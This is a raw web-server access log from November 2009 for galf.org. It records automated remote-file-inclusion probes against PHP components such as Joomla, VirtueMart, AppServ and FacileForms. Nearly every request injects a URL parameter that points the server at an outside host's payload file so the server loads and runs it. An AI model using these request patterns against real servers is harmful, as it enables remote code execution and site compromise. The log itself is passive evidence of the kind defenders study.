66.244.236.249 - - [02/Nov/2009:02:51:44 -0800] "GET /logs/access_090622.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:51:50 -0800] "GET /logs/scripts.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:51:50 -0800] "GET /logs/access_090914.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:51:50 -0800] "GET /logs/access_090921.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:51:54 -0800] "GET /logs/access_090323.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:51:58 -0800] "GET /logs/access_090316.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:51:58 -0800] "GET /logs/access_090928.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:51:58 -0800] "GET /logs/access_090907.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:52:23 -0800] "GET /forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [02/Nov/2009:02:52:23 -0800] "GET /logs//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [02/Nov/2009:02:52:23 -0800] "GET /logs/access.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [02/Nov/2009:02:52:43 -0800] "GET /logs/access_090824.log%20%20//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [02/Nov/2009:02:52:54 -0800] "GET /logs/access_090504.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [02/Nov/2009:02:52:59 -0800] "GET /logs/access_090504.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [02/Nov/2009:02:53:09 -0800] "GET /logs/access_090504.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:53:55 -0800] "GET /logs/access_090803.log/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:53:55 -0800] "GET /logs/access_090629.log/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:53:55 -0800] "GET /index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:53:55 -0800] "GET /logs/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:54:23 -0800] "GET /logs/access_090504.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:54:23 -0800] "GET /logs/access_090427.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:54:23 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:54:23 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:54:42 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:54:42 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:54:42 -0800] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [02/Nov/2009:02:54:51 -0800] "GET /logs/access_090622.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:54:54 -0800] "GET /logs/access_090615.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:02:55:07 -0800] "GET /logs/access_091012.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:20 -0800] "GET /logs/access_090803.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:26 -0800] "GET /logs/access_090316.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090817.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090907.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090406.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090727.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090622.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090323.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090629.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090330.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/access_090608.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:55:27 -0800] "GET /logs/scripts.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:55:50 -0800] "GET /index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:55:50 -0800] "GET /logs/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:55:50 -0800] "GET /logs/access_090803.log/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [02/Nov/2009:02:56:00 -0800] "GET /logs/access_090504.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:56:01 -0800] "GET /logs/access_090720.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:56:01 -0800] "GET /logs/access_090810.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.244.236.249 - - [02/Nov/2009:02:56:01 -0800] "GET /logs/access_090413.log//forum//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:56:39 -0800] "GET /logs/access_090629.log/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [02/Nov/2009:02:56:57 -0800] "GET /logs/access_090504.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [02/Nov/2009:02:57:26 -0800] "GET /logs/access_090824.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:02:57:35 -0800] "GET /skin/ruvin_fine_gall2/login.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:02:57:35 -0800] "GET /logs/access_090831.log//skin/ruvin_fine_gall2/login.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:02:57:35 -0800] "GET /logs//skin/ruvin_fine_gall2/login.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [02/Nov/2009:02:57:59 -0800] "GET /logs/access_090504.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [02/Nov/2009:02:59:27 -0800] "GET /logs/access_090824.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:59:36 -0800] "GET /index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:59:36 -0800] "GET /logs/access_090803.log/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:59:36 -0800] "GET /logs/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:02:59:36 -0800] "GET /logs/access_090629.log/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.234 - - [02/Nov/2009:03:00:31 -0800] "GET /logs/access_090504.log/modifyform.html?code=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [02/Nov/2009:03:00:38 -0800] "GET /logs/access_090907.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.234 - - [02/Nov/2009:03:01:39 -0800] "GET /logs/access_090907.log/modifyform.html?code=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.234 - - [02/Nov/2009:03:04:23 -0800] "GET /logs/access_090824.log/modifyform.html?code=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [02/Nov/2009:03:10:16 -0800] "GET /logs/access_090907.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:03:10:59 -0800] "GET /logs/access_090406.log%20%20/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [02/Nov/2009:03:11:54 -0800] "GET /logs/access_090928.log%20%20/index.php?pagina=http://iyu.fileave.com/id1.txt???????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:12:16 -0800] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:12:16 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:12:16 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [02/Nov/2009:03:12:38 -0800] "GET /logs/access_090824.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:13:09 -0800] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:17:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:17:52 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:17:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:12 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:13 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:17 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:18 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:19 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:03:18:20 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [02/Nov/2009:03:19:13 -0800] "GET /logs/access_090907.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [02/Nov/2009:03:22:09 -0800] "GET /logs/access_090824.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:22:34 -0800] "GET /appserv/main.php?appserv_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:22:34 -0800] "GET /logs//appserv/main.php?appserv_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:22:34 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [02/Nov/2009:03:23:26 -0800] "GET /logs/access_090907.log/modifyform.html?code=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:23:56 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:24:26 -0800] "GET /logs/access_090831.log//appserv/main.php?appserv_root=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:03:24:32 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:03:24:32 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:03:24:32 -0800] "GET /logs/access_090706.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [02/Nov/2009:03:41:42 -0800] "GET /logs/access.log//facileforms.frame.php?ff_compath=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [02/Nov/2009:03:41:42 -0800] "GET /logs//facileforms.frame.php?ff_compath=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [02/Nov/2009:03:41:42 -0800] "GET /facileforms.frame.php?ff_compath=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [02/Nov/2009:03:41:48 -0800] "GET /logs/access.log//facileforms.frame.php?ff_compath=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [02/Nov/2009:03:41:48 -0800] "GET /facileforms.frame.php?ff_compath=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [02/Nov/2009:03:41:48 -0800] "GET /logs//facileforms.frame.php?ff_compath=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
113.52.152.25 - - [02/Nov/2009:03:42:23 -0800] "GET /logs/access_090316.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:03:42:23 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:03:42:23 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:03:43:33 -0800] "GET /logs/access_090525.log%20%20/index.php?conteudo=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:03:43:33 -0800] "GET /index.php?conteudo=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:03:43:33 -0800] "GET /logs/index.php?conteudo=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:43:34 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:43:34 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:43:34 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
